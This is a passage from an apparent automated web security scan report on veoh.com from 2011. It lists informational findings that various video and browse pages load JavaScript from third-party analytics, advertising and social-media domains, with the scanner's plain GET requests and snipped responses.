Content-Length: 76599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296767241"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.34. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/animation/watch/v20767083WdnCj7gW

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/animation/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 132878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20767083WdnCj7gW&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768576"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.35. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:21 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 140850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20767641DYmkkC9T&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768561"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.36. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=30
Content-Length: 142204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20767155HXCcYkcJ&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768574"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.37. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:43 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 134408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20767324YkGXZzfQ&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768584"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.38. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=73
Content-Length: 147258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20767178Fn5bZQJP&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768564"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.39. http://www.veoh.com/browse/webseries  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/webseries

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/webseries HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 75167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769489"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.40. http://www.veoh.com/browse/webseries/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/webseries/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/webseries/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:19 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=65
Content-Length: 75167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769039"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.41. http://www.veoh.com/browse/webseries/featured/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/webseries/featured/1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/webseries/featured/1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:32 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 65871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768992"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.42. http://www.veoh.com/bulletin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /bulletin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /bulletin HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
